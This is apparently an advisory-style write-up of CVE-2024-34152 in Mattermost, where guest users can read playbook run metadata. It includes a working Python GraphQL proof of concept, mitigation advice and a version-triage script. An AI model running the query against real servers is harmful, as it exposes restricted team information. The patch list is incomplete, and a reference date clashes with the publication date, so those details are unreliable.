CVE-2024-34152: Uncovering the Access Control Vulnerability in Mattermost Versions 9.5.x, 9.6.x, and 8.1.x

A critical vulnerability, identified as CVE-2024-34152, was recently discovered in Mattermost, affecting versions 9.5.x <= 9.5.3, 9.6.x <= 9.6.1, and 8.1.x <= 8.1.12. The flaw is an access control weakness: a guest member can read the metadata of a public playbook run linked to a channel the guest belongs to. This happens when the guest member sends an RHSRuns GraphQL query request to the Mattermost server, potentially exposing sensitive team information.

In the following sections, we will dive into the details of this vulnerability, its implications, a code snippet that reproduces the issue, and possible mitigation measures.

Details of the CVE-2024-34152 Vulnerability

The CVE-2024-34152 vulnerability arises because Mattermost fails to perform proper access control checks on this query, so data that should be restricted to a specific user or team can be read without authorization.

Mattermost 8.1.x (<= 8.1.12)

Here's a code snippet that allows a guest member to send a GraphQL RHSRuns query request to the Mattermost server:

import requests

# Replace these with your Mattermost server URL, channel ID, and guest access token
MATTERMOST_SERVER_URL = "https://your-mattermost-server-url.com"
CHANNEL_ID = "abc123"
GUEST_ACCESS_TOKEN = "your_guest_access_token"

# The channel ID placeholder is substituted from CHANNEL_ID before the request is sent.
# "page" is the zero-based result page; the original snippet left this value blank,
# so the first page is requested here.
QUERY_TEMPLATE = """
query {
  rhsRuns (
    channelId: "__CHANNEL_ID__",
    searchTerm: "",
    type: "all",
    page: 0,
    perPage: 10
  ) {
    totalCount,
    pageInfo {
      startCursor,
      endCursor,
      hasNextPage,
      hasPreviousPage
    },
    nodes {
      id,
      title
    }
  }
}
"""
query = QUERY_TEMPLATE.replace("__CHANNEL_ID__", CHANNEL_ID)

url = f"{MATTERMOST_SERVER_URL}/api/v4/graphql"
headers = {
    "authorization": f"Bearer {GUEST_ACCESS_TOKEN}",
    "content-type": "application/json",
}
data = {"query": query}

# On an affected server the JSON body contains the run metadata (id, title, counts)
# for the guest's channel; raise_for_status() makes HTTP errors fail loudly.
response = requests.post(url, headers=headers, json=data)
response.raise_for_status()
print(response.json())

Running the above snippet as a guest user returns the metadata of a playbook run linked to a channel the guest is part of, exposing information that should be restricted.

Original References

- https://mattermost.com/blog/coordinated-disclosure-of-security-vulnerability-2024-12-03/
- https://github.com/mattermost/mattermost-server/security/advisories/GHSA-j995-w937-th9w

Mitigation Measures

To remediate this issue, Mattermost recommends upgrading to the following patched versions with proper access controls in place:

Mattermost 8.1.13

Additionally, administrators should review their guest member permissions and channel settings to ensure that only authorized personnel have the appropriate access.
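To triage a fleet of servers against the affected ranges stated at the top of this write-up, here is an added Python example (not from the original write-up or from Mattermost). The host names and inventory are constructed, and a minor line the advisory does not name is reported as "not listed" rather than assumed safe.

```python
# Added example (not from the original write-up or from Mattermost): classify server
# versions against the ranges this advisory lists as affected, to triage an inventory.
import re
from typing import Optional, Tuple

# Affected ranges exactly as stated above: minor line -> highest affected patch level.
AFFECTED = {
    (9, 5): 3,   # 9.5.x <= 9.5.3
    (9, 6): 1,   # 9.6.x <= 9.6.1
    (8, 1): 12,  # 8.1.x <= 8.1.12
}

def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Parse 'major.minor.patch'; tolerates a leading 'v' and a trailing pre-release tag."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)

def classify(version: str) -> str:
    """Return 'affected', 'not affected' or 'not listed' for one version string.
    A minor line the advisory does not name (e.g. 9.7.x) is 'not listed', not assumed safe;
    an unparsable string raises ValueError instead of silently passing as safe."""
    parsed = parse_version(version)
    if parsed is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = parsed
    ceiling = AFFECTED.get((major, minor))
    if ceiling is None:
        return "not listed"
    return "affected" if patch <= ceiling else "not affected"

def triage(inventory: dict) -> dict:
    """Map host -> verdict for a {host: version} inventory; bad strings become 'unknown'."""
    verdicts = {}
    for host, version in inventory.items():
        try:
            verdicts[host] = classify(version)
        except ValueError:
            verdicts[host] = "unknown"
    return verdicts

if __name__ == "__main__":
    # Constructed sample inventory; host names are hypothetical.
    sample = {"chat-a": "9.5.3", "chat-b": "9.5.4", "chat-c": "v8.1.12",
              "chat-d": "8.1.13", "chat-e": "9.7.1", "chat-f": "n/a"}
    for host, verdict in triage(sample).items():
        print(f"{host}: {verdict}")
```

Hosts reported as "affected" need the upgrade; "not listed" and "unknown" entries need a manual check against the vendor advisory rather than being treated as safe.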

Conclusion

CVE-2024-34152 allows guest users to read sensitive playbook run metadata they should not be able to access. By promptly upgrading the affected software, administrators can secure their team channels and playbooks. Moreover, a periodic review of user permissions and access controls helps avoid similar exposure in the future.

Timeline

Published on: 05/26/2024 14:15:09 UTC
Last modified on: 05/28/2024 12:39:28 UTC